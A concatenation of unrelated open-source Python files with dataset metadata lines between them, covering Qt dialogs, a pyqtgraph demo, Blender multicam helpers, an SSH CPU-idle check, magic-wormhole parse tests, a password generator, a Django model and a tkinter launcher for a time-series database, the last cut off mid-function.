Dialog_export_metadata.setWindowTitle(QtGui.QApplication.translate("Dialog_export_metadata", "Export metadata", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_exif_data.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export exif data", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_xmp_data.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export xmp data", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_iptc_data.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export iptc data", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_gps_data.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "gps data can be both in exif and xmp data", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_gps_data.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export gps data", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_iccprofile_data.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export ICC profile", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_all_metadata.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "(Un)Check this value will (un)check all underlying values", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_chk_export_all_metadata.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export all metadata", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_lbl.setText(QtGui.QApplication.translate("Dialog_export_metadata", "This option gives you the possibility to export the metadata from your selected photo(s). A number of formats is supported.\n"
"All formats give an export file per selected photo, apart from csv which will give you one (big) csv file for all selected photos.", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_lbl2.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Export to:", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_txt_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you a simple text output per photo", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_txt_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "Txt", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_tab_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you a tab separated text output per photo", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_tab_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "tab", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_xml_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you an xml formatted output file per photo", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_xml_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "xml", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_html_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you a table formatted html file per photo", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_html_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "html", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_xmp_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you an xmp structured file per photo", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_xmp_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "xmp", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_csv_radiobutton.setToolTip(QtGui.QApplication.translate("Dialog_export_metadata", "This option will give you one csv file for the selected photos", None, QtGui.QApplication.UnicodeUTF8))
self.qdem_csv_radiobutton.setText(QtGui.QApplication.translate("Dialog_export_metadata", "csv", None, QtGui.QApplication.UnicodeUTF8))
| gpl-3.0 | -1,964,207,848,574,446,800 | 87.571429 | 212 | 0.751703 | false | 3.48859 | false | false | false |
benvermaercke/pyqtgraph | examples/GLScatterPlotItem.py | 28 | 2864 | # -*- coding: utf-8 -*-
"""
Demonstrates use of GLScatterPlotItem with rapidly-updating plots.
"""
## Add path to library (just for examples; you do not need this)
import initExample
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.opengl as gl
import numpy as np
app = QtGui.QApplication([])
w = gl.GLViewWidget()
w.opts['distance'] = 20
w.show()
w.setWindowTitle('pyqtgraph example: GLScatterPlotItem')
g = gl.GLGridItem()
w.addItem(g)
##
## First example is a set of points with pxMode=False
## These demonstrate the ability to have points with real size down to a very small scale
##
pos = np.empty((53, 3))
size = np.empty((53))
color = np.empty((53, 4))
pos[0] = (1,0,0); size[0] = 0.5; color[0] = (1.0, 0.0, 0.0, 0.5)
pos[1] = (0,1,0); size[1] = 0.2; color[1] = (0.0, 0.0, 1.0, 0.5)
pos[2] = (0,0,1); size[2] = 2./3.; color[2] = (0.0, 1.0, 0.0, 0.5)
z = 0.5
d = 6.0
for i in range(3,53):
pos[i] = (0,0,z)
size[i] = 2./d
color[i] = (0.0, 1.0, 0.0, 0.5)
z *= 0.5
d *= 2.0
sp1 = gl.GLScatterPlotItem(pos=pos, size=size, color=color, pxMode=False)
sp1.translate(5,5,0)
w.addItem(sp1)
##
## Second example shows a volume of points with rapidly updating color
## and pxMode=True
##
pos = np.random.random(size=(100000,3))
pos *= [10,-10,10]
pos[0] = (0,0,0)
color = np.ones((pos.shape[0], 4))
d2 = (pos**2).sum(axis=1)**0.5
size = np.random.random(size=pos.shape[0])*10
sp2 = gl.GLScatterPlotItem(pos=pos, color=(1,1,1,1), size=size)
phase = 0.
w.addItem(sp2)
##
## Third example shows a grid of points with rapidly updating position
## and pxMode = False
##
pos3 = np.zeros((100,100,3))
pos3[:,:,:2] = np.mgrid[:100, :100].transpose(1,2,0) * [-0.1,0.1]
pos3 = pos3.reshape(10000,3)
d3 = (pos3**2).sum(axis=1)**0.5
sp3 = gl.GLScatterPlotItem(pos=pos3, color=(1,1,1,.3), size=0.1, pxMode=False)
w.addItem(sp3)
def update():
## update volume colors
global phase, sp2, d2
s = -np.cos(d2*2+phase)
color = np.empty((len(d2),4), dtype=np.float32)
color[:,3] = np.clip(s * 0.1, 0, 1)
color[:,0] = np.clip(s * 3.0, 0, 1)
color[:,1] = np.clip(s * 1.0, 0, 1)
color[:,2] = np.clip(s ** 3, 0, 1)
sp2.setData(color=color)
phase -= 0.1
## update surface positions and colors
global sp3, d3, pos3
z = -np.cos(d3*2+phase)
pos3[:,2] = z
color = np.empty((len(d3),4), dtype=np.float32)
color[:,3] = 0.3
color[:,0] = np.clip(z * 3.0, 0, 1)
color[:,1] = np.clip(z * 1.0, 0, 1)
color[:,2] = np.clip(z ** 3, 0, 1)
sp3.setData(pos=pos3, color=color)
t = QtCore.QTimer()
t.timeout.connect(update)
t.start(50)
## Start Qt event loop unless running in interactive mode.
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| mit | 5,845,931,509,583,227,000 | 24.345133 | 91 | 0.603701 | false | 2.433305 | false | false | false |
ibarbech/learnbot | learnbot_dsl/guis/help.py | 1 | 3411 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/ivan/robocomp/components/learnbot/learnbot_dsl/guis/help.ui',
# licensing of '/home/ivan/robocomp/components/learnbot/learnbot_dsl/guis/help.ui' applies.
#
# Created: Thu Mar 7 12:39:25 2019
# by: pyside2-uic running on PySide2 5.12.1
#
# WARNING! All changes made in this file will be lost!
from PySide2 import QtCore, QtGui, QtWidgets
class Ui_Help(object):
def setupUi(self, Help):
Help.setObjectName("Help")
Help.resize(902, 734)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Help.sizePolicy().hasHeightForWidth())
Help.setSizePolicy(sizePolicy)
self.horizontalLayout = QtWidgets.QHBoxLayout(Help)
self.horizontalLayout.setObjectName("horizontalLayout")
self.splitter = QtWidgets.QSplitter(Help)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setObjectName("splitter")
self.treeWidget = QtWidgets.QTreeWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.treeWidget.sizePolicy().hasHeightForWidth())
self.treeWidget.setSizePolicy(sizePolicy)
self.treeWidget.setObjectName("treeWidget")
self.treeWidget.headerItem().setText(0, "1")
self.verticalLayoutWidget = QtWidgets.QWidget(self.splitter)
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.layoutWebKit = QtWidgets.QVBoxLayout()
self.layoutWebKit.setObjectName("layoutWebKit")
self.verticalLayout.addLayout(self.layoutWebKit)
self.horizontalLayoutButtons = QtWidgets.QHBoxLayout()
self.horizontalLayoutButtons.setObjectName("horizontalLayoutButtons")
self.pushButtonPrevious = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.pushButtonPrevious.setObjectName("pushButtonPrevious")
self.horizontalLayoutButtons.addWidget(self.pushButtonPrevious)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayoutButtons.addItem(spacerItem)
self.pushButtoNext = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.pushButtoNext.setObjectName("pushButtoNext")
self.horizontalLayoutButtons.addWidget(self.pushButtoNext)
self.verticalLayout.addLayout(self.horizontalLayoutButtons)
self.horizontalLayout.addWidget(self.splitter)
self.retranslateUi(Help)
QtCore.QMetaObject.connectSlotsByName(Help)
def retranslateUi(self, Help):
Help.setWindowTitle(QtWidgets.QApplication.translate("Help", "Help", None, -1))
self.pushButtonPrevious.setText(QtWidgets.QApplication.translate("Help", "Previous", None, -1))
self.pushButtoNext.setText(QtWidgets.QApplication.translate("Help", "Next", None, -1))
| gpl-3.0 | 1,551,152,030,710,378,800 | 53.142857 | 121 | 0.742011 | false | 4.301387 | false | false | false |
nocarryr/blender-scripts | multicam_tools/utils.py | 1 | 2424 | import bpy
def get_full_data_path(bpy_obj):
return repr(bpy_obj)
def get_bpy_obj_from_data_path(data_path):
## TODO: this is hackish and insecure
return eval(data_path)
def get_active_strip(context=None):
if context is None:
context = bpy.context
return context.scene.sequence_editor.active_strip
def get_fcurve(scene, data_path):
action = scene.animation_data.action
if action is None:
return None
for fc in action.fcurves:
if fc.data_path == data_path:
return fc
def create_fcurve(scene, data_path, action_group=''):
action = scene.animation_data.action
if action is None:
return None
return action.fcurves.new(data_path, action_group=action_group)
def get_or_create_fcurve(scene, data_path, action_group=''):
fc = get_fcurve(scene, data_path)
if fc is not None:
return fc
return create_fcurve(scene, data_path, action_group)
def set_keyframe(fcurve, frame, value, interpolation='CONSTANT'):
kf = fcurve.keyframe_points.insert(frame, value)
kf.interpolation = interpolation
return kf
def get_keyframe(fcurve, *frames):
if len(frames) > 1:
keyframes = []
else:
keyframes = None
for kf in fcurve.keyframe_points:
if kf.co[0] in frames:
if keyframes is not None:
keyframes.append(kf)
else:
return kf
return keyframes
def iter_keyframes(**kwargs):
fcurves = kwargs.get('fcurves')
if fcurves is None:
scene = kwargs.get('scene')
action = scene.animation_data.action
fcurves = action.fcurves
for fc in fcurves:
for kf in fc.keyframe_points:
yield kf, fc
def get_keyframe_dict(**kwargs):
d = {}
for kf, fc in iter_keyframes(**kwargs):
frame = kf[0]
if frame not in d:
d[frame] = {}
d[frame][fc.data_path] = {'keyframe':kf, 'fcurve':fc}
return d
class MultiCamContext:
@classmethod
def poll(cls, context):
if context.area.type != 'SEQUENCE_EDITOR':
return 0
active_strip = get_active_strip(context)
if active_strip is None:
return 0
if active_strip.type != 'MULTICAM':
return 0
return 1
def get_strip(self, context):
return get_active_strip(context)
| gpl-2.0 | -932,779,351,380,638,100 | 27.517647 | 67 | 0.60066 | false | 3.591111 | false | false | false |
Runbook/runbook | src/monitors/checks/cpu-idle/__init__.py | 2 | 1522 | from fabric.api import hide, run, env
import time
import json
def run_cmd(cmd):
with hide('output', 'running', 'warnings'):
return run(cmd, timeout=1200)
def check(**kwargs):
''' Login over SSH and execute shell command '''
jdata = kwargs['jdata']
logger = kwargs['logger']
env.gateway = jdata['data']['gateway']
env.host_string = jdata['data']['host_string']
env.user = jdata['data']['username']
env.key = jdata['data']['sshkey']
env.shell = "/bin/sh -c"
env.disable_known_hosts = True
env.warn_only = True
env.abort_on_prompts = True
results = run_cmd("uname -a")
if results.succeeded:
if "FreeBSD" in results:
cmd = "vmstat 2 2"
results = run_cmd(cmd)
if results.succeeded:
lines = results.splitlines()
vmstat_info = lines[-1].split()
cpu_idle = float(vmstat_info[-1])
else:
return None
else:
cmd = "vmstat 2 2"
results = run_cmd(cmd)
if results.succeeded:
lines = results.splitlines()
vmstat_info = lines[-1].split()
cpu_idle = float(vmstat_info[-3])
else:
return None
else:
return None
threshold = float(jdata['data']['threshold'])
logger.debug("cpu-idle: Idle {0} Threshold {1}".format(cpu_idle, threshold))
if cpu_idle > threshold:
return True
else:
return False
| apache-2.0 | 4,752,785,440,156,244,000 | 29.44 | 80 | 0.54205 | false | 3.872774 | false | false | false |
warner/magic-wormhole | src/wormhole/test/dilate/test_parse.py | 1 | 2402 | from __future__ import print_function, unicode_literals
import mock
from twisted.trial import unittest
from ..._dilation.connection import (parse_record, encode_record,
KCM, Ping, Pong, Open, Data, Close, Ack)
class Parse(unittest.TestCase):
def test_parse(self):
self.assertEqual(parse_record(b"\x00"), KCM())
self.assertEqual(parse_record(b"\x01\x55\x44\x33\x22"),
Ping(ping_id=b"\x55\x44\x33\x22"))
self.assertEqual(parse_record(b"\x02\x55\x44\x33\x22"),
Pong(ping_id=b"\x55\x44\x33\x22"))
self.assertEqual(parse_record(b"\x03\x00\x00\x02\x01\x00\x00\x01\x00"),
Open(scid=513, seqnum=256))
self.assertEqual(parse_record(b"\x04\x00\x00\x02\x02\x00\x00\x01\x01dataaa"),
Data(scid=514, seqnum=257, data=b"dataaa"))
self.assertEqual(parse_record(b"\x05\x00\x00\x02\x03\x00\x00\x01\x02"),
Close(scid=515, seqnum=258))
self.assertEqual(parse_record(b"\x06\x00\x00\x01\x03"),
Ack(resp_seqnum=259))
with mock.patch("wormhole._dilation.connection.log.err") as le:
with self.assertRaises(ValueError):
parse_record(b"\x07unknown")
self.assertEqual(le.mock_calls,
[mock.call("received unknown message type: {}".format(
b"\x07unknown"))])
def test_encode(self):
self.assertEqual(encode_record(KCM()), b"\x00")
self.assertEqual(encode_record(Ping(ping_id=b"ping")), b"\x01ping")
self.assertEqual(encode_record(Pong(ping_id=b"pong")), b"\x02pong")
self.assertEqual(encode_record(Open(scid=65536, seqnum=16)),
b"\x03\x00\x01\x00\x00\x00\x00\x00\x10")
self.assertEqual(encode_record(Data(scid=65537, seqnum=17, data=b"dataaa")),
b"\x04\x00\x01\x00\x01\x00\x00\x00\x11dataaa")
self.assertEqual(encode_record(Close(scid=65538, seqnum=18)),
b"\x05\x00\x01\x00\x02\x00\x00\x00\x12")
self.assertEqual(encode_record(Ack(resp_seqnum=19)),
b"\x06\x00\x00\x00\x13")
with self.assertRaises(TypeError) as ar:
encode_record("not a record")
self.assertEqual(str(ar.exception), "not a record")
| mit | 7,898,744,829,652,153,000 | 53.590909 | 85 | 0.579517 | false | 3.095361 | false | false | false |
rcabralc/pyssword | src/pyssword.py | 1 | 12069 | #!/usr/bin/env python
# vim: fdm=marker
"""
pyssword - Password generator
Generates a random password with a specified entropy within specified character
sets. Uses /dev/urandom for random info by default.
Usage:
pyssword [--lower --upper --numbers --symbols --entropy=bits --no-info]
pyssword --read [--lower --upper --numbers --symbols --entropy=bits --no-info --radix=radix --one-based]
pyssword --die=radix [--lower --upper --numbers --symbols --entropy=bits --no-info]
pyssword passphrase [--entropy=bits --no-info]
pyssword passphrase --read [--entropy=bits --no-info --radix=radix --one-based]
pyssword passphrase --die=radix [--entropy=bits --no-info]
pyssword passphrase --info
pyssword --help
Options:
passphrase
Output a passphrase instead of a password. All characters are in
lowercase. This uses the EFF's long list, as described in
https://www.eff.org/deeplinks/2016/07/new-wordlists-random-passphrases
-e bits --entropy=bits
[Default: 128]
The entropy, in bits, of the password. This is a minimum value; the
final entropy may be a bit higher than specified due to a round up for
an integral number of random inputs.
-l --lower
Use lowercase letters.
-u --upper
Use uppercase letters.
-n --numbers
Use numbers.
-s --symbols
Use symbols.
--info
Ask for a passphrase (a white-space separated list of words of the
current word list) from stdin. If connected to a terminal, the user
will be prompted to enter the passphrase. Any word not in the word
list will cause an error.
Outputs the passphrase info.
--no-info
Print only the password, without additional info.
-r --read
Ask for random information instead of relying on /dev/urandom. Numbers
are collected from stdin until enough entropy has been achieved. If
connected to a terminal, the user will be prompted to manually enter
random numbers.
Note: In platforms which have no /dev/urandom, this is the only way to
use the script.
You can use any source of random data. But keep in mind that in this
case the strength of the generated password is entirely dependent on
the random nature of the numbers provided. The best way to do so is to
use real, fair dice, and to actually throw them for getting random
input values. Also, numbers are not assumed to be given in base-10 by
default (see `--radix').
When connecting stdin to a pipe, there's the possibility of not enough
numbers be provided, in which case the script will just block
endlessly, waiting for input. Be sure to provide enough input in such
cases. For the math inclined, the minimum quantity of numbers needed
for a given radix and entropy (in bits) is:
total = round_up(entropy_bits / log(radix, 2))
Or you can just run the program without a pipe and wait for it to ask
you for numbers. The prompt has the actual quantity of expected
numbers. With this information, cancel it (Control-C) and try again
using a pipe.
--radix=radix
[Default: 256]
The radix used for random input numbers. Only used if `--read' is
given. Values range from 0 up to but excluding `radix' (see
`--one-based' for ranging values from 1 up to and including `radix').
-1 --one-based
Whether or not numbers are zero- or one- based. They are assumed to be
zero-based by default.
-d radix --die=radix
Treat input as a die with `radix' sides. Shortcut for `--read',
`--radix=radix' and `--one-based'.
-h --help
Show this.
Examples:
Without arguments, all characters are used to compute a password with the
default entropy (lowercase, uppercase, numbers and symbols):
$ pyssword --no-info
&I3`?)R0h0Co0H[>k)|\\
You can restrict the characters used and use a specific entropy:
$ pyssword --lower --numbers --entropy 64 --no-info
azs99hrimiov0g
By default, that is, without --no-info, additional information is shown:
$ pyssword --entropy 30
Actual entropy: 32.772944258388186
Set length: 94
Password: h+!:4
The full character set has 94 letters/numbers/symbols.
The source of random information can be changed. For using 16 bytes (that
is, 128 bits) from /dev/random do the following:
$ dd if=/dev/random bs=16 count=1 2>/dev/null | od -t u1 -A n -v | pyssword --read --no-info
)PN"GgyF%`#TdlI3IweV
Using real dice with six sides for generating a 26-bit passphrase:
$ pyssword passphrase --read --radix 6 --one-based --entropy 26
1/11: 1 2 3 4 5 6 1 2 3 4 5
Actual entropy: 28.434587507932722
Set length: 7776
Password: abacus dispatch arousal
The same as above, using the shortcut option --die:
$ pyssword passphrase --die 6 --entropy 26
1/11: 1 2 3 4 5 6 1 2 3 4 5
Actual entropy: 28.434587507932722
Set length: 7776
Password: abacus dispatch arousal
The same as above, using a pipe and without info:
$ cat - > /tmp/rolls
1 2 3 4 5 6 1 2 3 4 5
<Control-D>
$ cat /tmp/rolls | pyssword passphrase -d 6 -e 26 --no-info
abacus dispatch arousal
$ shred -u /tmp/rolls
Note: the three examples above returned three words, but the resulting
entropy is not 38.8 (each word in Dicerware list provides about 12.9 bits,
which is what you can get from a list with 7776 words). This happens
because in order to get at least 26 bits of entropy eleven die rolls are
needed, but then you'll get 28.4 bits. This value exceeds the entropy
provided by only two words (25.8 bits), and a third one is needed for
accounting for the difference and also to satisfy the requirement of at
least 26 bits. The entropy which exists is the same that gets in: no
entropy is created out of thin air, and the script makes its best efforts
to also not waste it.
"""
from math import ceil, log
import docopt
import itertools
import os
import pkg_resources
import random
import sys
WORDS = []
wordsfile = pkg_resources.resource_stream(
__name__,
'eff_large_wordlist.txt'
)
for wordline in wordsfile:
_base6index, word = wordline.rstrip().split(b'\t')
WORDS.append(word.decode('us-ascii'))
FULL = [chr(v) for v in range(33, 127)]
UPPER = [chr(v) for v in range(65, 65 + 26)]
LOWER = [chr(v) for v in range(97, 97 + 26)]
NUMBERS = [chr(v) for v in range(48, 48 + 10)]
SYMBOLS = list(set(FULL) - set(NUMBERS) - set(UPPER) - set(LOWER))
class IntOption:
def __init__(self, args, option):
self.option = option
try:
self.value = int(args[option])
except ValueError:
error("{} is not a valid integer".format(option))
def get(self):
return self.value
def greater_than(self, min):
if self.value <= min:
error("{} must be greater than {}".format(self.option, min))
return self
def less_than(self, max):
if self.value >= max:
error("{} must be less than {}".format(self.option, max))
return self
class Number:
def __init__(self, radix, digits):
assert radix > 1
for digit in digits:
assert 0 <= digit < radix
self._radix = radix
self._digits = digits
self.max_within_length = radix**len(digits)
self.bits = log(self.max_within_length, 2)
def convert(self, radix):
n = 0
exp = 0
minlength = ceil(log(self.max_within_length, radix))
for digit in reversed(self._digits):
n += digit * (self._radix**exp)
exp += 1
if n == 0:
digits = [0]
else:
digits = []
while n:
r = n % radix
n = n // radix
digits.append(r)
padding = [0] * max(minlength - len(digits), 0)
return self.__class__(radix, padding + list(reversed(digits)))
def __iter__(self):
return iter(self._digits)
class TokenSet(tuple):
def __new__(cls, tokens):
if len(tokens) < 2:
error("Not enough tokens to choose from. Use a longer set.")
return tuple.__new__(cls, tokens)
@property
def bits(self):
return log(len(self), 2)
def select(self, number):
return [self[i] for i in number.convert(len(self))]
class Password:
def __init__(self, tokenset, number, separator):
self.set = tokenset
self.entropy = number.bits
self.value = tokenset.select(number)
self.separator = separator
def __str__(self):
return self.separator.join(self.value)
def error(message):
print(message)
sys.exit(1)
def run(args):
is_passphrase = args['passphrase']
if is_passphrase:
tokens = WORDS
else:
tokens = []
tokens.extend(args['--lower'] and LOWER or [])
tokens.extend(args['--upper'] and UPPER or [])
tokens.extend(args['--numbers'] and NUMBERS or [])
tokens.extend(args['--symbols'] and SYMBOLS or [])
tokens = tokens if len(tokens) else FULL
assert len(tokens) == len(set(tokens))
tokenset = TokenSet(tokens)
if args['--die']:
args['--read'] = True
args['--radix'] = args['--die']
args['--one-based'] = True
if args['--info']:
radix = len(tokens)
generator, entropy = read_words(tokens)
else:
entropy = IntOption(args, '--entropy').greater_than(0).get()
if args['--read']:
radix = IntOption(args, '--radix').greater_than(1).get()
generator = user_generator(entropy, radix, args['--one-based'])
else:
rng = random.SystemRandom()
radix = len(tokens)
generator = random_generator(rng, radix)
total = ceil(entropy / log(radix, 2))
inputs = list(itertools.islice(source(generator), total))
number = Number(radix, inputs)
pw = Password(tokenset, number, ' ' if is_passphrase else '')
if args['--no-info']:
print(pw)
else:
print("Actual entropy: {}\n"
"Set length: {}\n"
"Password: {}"
"".format(pw.entropy, len(pw.set), pw))
def random_generator(rng, radix):
while True:
yield rng.randrange(radix)
def user_generator(desired_entropy, radix, onebased):
total = ceil(desired_entropy / log(radix, 2))
promptsize = 2 * len(str(total)) + len('/')
count = 0
offset = -1 if onebased else 0
def readline(line):
values = line.strip().split(' ')
try:
values = [int(value) + offset for value in values if value]
except:
values = []
yield from (v for v in values if 0 <= v < radix)
while True:
if sys.stdin.isatty():
prompt = '{}/{}'.format(count + 1, total)
print(prompt.rjust(promptsize), end=': ')
sys.stdout.flush()
for value in readline(sys.stdin.readline()):
count += 1
yield value
def read_words(tokens):
if sys.stdin.isatty():
print('Enter words separated by space', end=': ')
sys.stdout.flush()
values = []
for word in sys.stdin.readline().strip().split(' '):
try:
values.append(tokens.index(word))
except ValueError:
error("{} is not part of the word list.".format(word))
return (values, log(len(tokens)**len(values), 2))
def source(*inputs):
return itertools.chain(*[iter(input) for input in inputs])
def main():
try:
return run(docopt.docopt(__doc__))
except KeyboardInterrupt:
return 1
if __name__ == '__main__':
sys.exit(main())
| mit | -8,042,619,878,728,763,000 | 29.946154 | 108 | 0.607755 | false | 3.824144 | false | false | false |
uclouvain/OSIS-Louvain | base/models/abstracts/abstract_education_group_achievement.py | 2 | 2574 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2017 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from ckeditor.fields import RichTextField
from django.conf import settings
from django.db import models
from django.db.models import F
from django.utils.translation import gettext_lazy as _
from ordered_model.admin import OrderedModelAdmin
from ordered_model.models import OrderedModel
class AbstractEducationGroupAchievementAdmin(OrderedModelAdmin):
list_display = ('code_name', 'order', 'move_up_down_links')
readonly_fields = ['order']
search_fields = ['code_name', 'order']
class AbstractEducationGroupAchievementQuerySet(models.QuerySet):
def annotate_text(self, language_code):
return self.annotate(
text=F('french_text') if language_code == settings.LANGUAGE_CODE_FR else F('english_text')
)
class AbstractEducationGroupAchievement(OrderedModel):
external_id = models.CharField(max_length=100, blank=True, null=True, db_index=True)
changed = models.DateTimeField(null=True, auto_now=True)
code_name = models.CharField(max_length=100, verbose_name=_('code'))
english_text = RichTextField(null=True, verbose_name=_('text in English'))
french_text = RichTextField(null=True, verbose_name=_('text in French'))
class Meta:
abstract = True
objects = AbstractEducationGroupAchievementQuerySet.as_manager()
| agpl-3.0 | -3,911,626,178,749,473,000 | 42.610169 | 102 | 0.692577 | false | 3.989147 | false | false | false |
Planet-Nine/cs207project | go_server_SAX.py | 1 | 8656 | #!/usr/bin/env python3
from tsdb import TSDBServer
from tsdb.persistentdb import PersistentDB
import timeseries as ts
import tkinter as tk
identity = lambda x: x
schema = {
'pk': {'convert': identity, 'index': None,'type':str}, #will be indexed anyways
'ts': {'convert': identity, 'index': None},
'order': {'convert': int, 'index': 1,'type':int},
'blarg': {'convert': int, 'index': 1,'type' : int},
'useless': {'convert': identity, 'index': None, 'type' : str},
'mean': {'convert': float, 'index': 1,'type' : float},
'std': {'convert': float, 'index': 1, 'type' : float},
'vp': {'convert': bool, 'index': 1, 'type' : bool}
}
#schema = {
# 'pk': {'convert': identity, 'index': None, 'type':str}, #will be indexed anyways
# 'ts': {'convert': identity, 'index': None},
#}
NUMVPS = 5
def main(load=False, dbname="db", overwrite=False, threshold = 10, wordlength = 16, tslen = 256, cardinality = 64):
# we augment the schema by adding columns for 5 vantage points
#for i in range(NUMVPS):
# schema["d_vp-{}".format(i)] = {'convert': float, 'index': 1}
db = PersistentDB(schema, 'pk',load=load, dbname=dbname, overwrite=overwrite, threshold = threshold, wordlength = wordlength, tslen = tslen, cardinality = cardinality)
server = TSDBServer(db)
server.run()
if __name__=='__main__':
class SampleApp(tk.Tk):
def __init__(self):
tk.Tk.__init__(self)
self.destroy()
self.master = tk.Tk()
self.master2 = None
self.label = tk.Label(self.master,text="""
This is a brief introduction to the similarity search for time series
using the iSAX index.
In the next window you will be asked to input some values. The first
determines whether to load or not the database from some existing database.
You will next be asked to provide a database name for loading or writing.
Next, whether to overwrite the existing database, in the event that one of
the given name exists. You will further be asked to give the cardinality of
the iSAX representation to be used, which is essentially the number of vertical
slices into which you wish the time series to be divided for indexing.
Cardinalities greater than 64 are not supported at the moment. The next
value is a threshold, the number of time series to hold in a leaf node. Then the
world length, so the number of segments or horizontal slices for indexing the
time series. Finally, please provide the time series length, which is the number
of data points you wish your time series to be interpolated to for uniformization
of the time series. These interpolation points will be evenly spaced between the
maximum and minimum time values, including the endpoints. If no values are input
defaults will be used. Defaults are indicated by [...].
""",justify = 'left')
self.button = tk.Button(self.master, text="continue", command=self.on_button)
self.label.pack()
self.button.pack()
def on_button(self):
if self.master2:
self.master2.destroy()
else:
self.master.destroy()
self.card = 64
self.dbn = "db"
self.th = 10
self.wl = 8
self.tslen = 256
self.master1 = tk.Tk()
self.label2 = tk.Label(self.master1,text="Load (true or false) [False]: ")
self.entry2 = tk.Entry(self.master1)
self.label3 = tk.Label(self.master1,text="Database name (no spaces) [db]: ")
self.entry3 = tk.Entry(self.master1)
self.label4 = tk.Label(self.master1,text="Overwrite (true or false) [False]: ")
self.entry4 = tk.Entry(self.master1)
self.label1 = tk.Label(self.master1,text="Cardinality (must be a power of 2) [64]: ")
self.entry1 = tk.Entry(self.master1)
self.label5 = tk.Label(self.master1,text="Threshold (must be a positive integer) [10]: ")
self.entry5 = tk.Entry(self.master1)
self.label6 = tk.Label(self.master1,text="Word length (must be a power of 2) [8]: ")
self.entry6 = tk.Entry(self.master1)
self.label7 = tk.Label(self.master1,text="Time series length (must be a power of 2) [256]: ")
self.entry7 = tk.Entry(self.master1)
self.button = tk.Button(self.master1, text="continue", command=self.on_button1)
self.label2.pack()
self.entry2.pack()
self.label3.pack()
self.entry3.pack()
self.label4.pack()
self.entry4.pack()
self.label1.pack()
self.entry1.pack()
self.label5.pack()
self.entry5.pack()
self.label6.pack()
self.entry6.pack()
self.label7.pack()
self.entry7.pack()
self.button.pack()
def on_button1(self):
self.master2 = tk.Tk()
card = self.entry1.get()
if card:
try:
self.card = int(card)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the cardinality.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
self.ld = self.entry2.get()
